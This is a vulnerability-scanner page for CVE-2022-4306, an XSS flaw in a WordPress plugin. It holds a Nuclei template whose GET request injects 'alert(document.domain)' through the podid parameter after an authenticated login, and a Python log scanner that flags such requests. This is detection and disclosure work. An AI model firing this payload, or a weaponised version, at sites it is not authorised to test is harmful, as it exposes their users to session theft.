WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting
ID: CVE-2022-4306
Severity: medium
Author: r3Y3r53
Tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project
Description
WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks.
YAML Source
id: CVE-2022-4306

info:
  name: WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
  remediation: Fixed in version 1.5.4.
  reference:
    - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4306
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-4306
    cwe-id: CWE-79
    epss-score: 0.00092
    epss-percentile: 0.37956
    cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: panda_pods_repeater_field_project
    product: panda_pods_repeater_field
    framework: wordpress
  tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "alert(document.domain)")'
          - 'contains(body_2, "panda-repeater-add-new")'
        condition: and
# digest: 4a0a00473045022100f7bcdfa91888dfbd43897395bfcafee5f9760cbbebec994960994f766887068c022079f97d7dba8e5f47b4a2b01394e9cb468601753bd1f3a22b8d7ee5e134889c17:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4306.yaml"
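
To check whether requests shaped like the template's second request have already reached a site, access logs can be searched for hits on the plugin file where an ID parameter is not a plain number. The script below is an added example, not part of the original template or the Nuclei project; it assumes combined-format access logs and that `itemid` and `podid` hold numeric IDs in normal use, and its log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path requested by the template's second request.
PLUGIN_PATH = "/wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php"
# Assumption: these parameters hold numeric IDs in normal use.
NUMERIC_PARAMS = ("itemid", "podid")
# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=4&podid=12&iframe_id=panda-repeater-add-new HTTP/1.1" 200 4890 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:06:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2100 "-" "-"',
]


def suspicious_params(log_line):
    """Return {param: decoded value} for non-numeric ID parameters, else {}."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return {}
    try:
        url = urlsplit(match.group(1))
    except ValueError:  # malformed request target
        return {}
    if unquote(url.path).lower() != PLUGIN_PATH:
        return {}
    hits = {}
    for name, values in parse_qs(url.query).items():
        for value in values:
            if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                hits[name] = value
    return hits


def scan(lines):
    """Return (line_number, hits) for every log line with a suspicious parameter."""
    results = []
    for number, line in enumerate(lines, start=1):
        hits = suspicious_params(line)
        if hits:
            results.append((number, hits))
    return results


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric ID parameter(s): {hits}")
```

A hit shows only that such a request was sent; whether the site was affected depends on the installed plugin version, since the issue is fixed in 1.5.4.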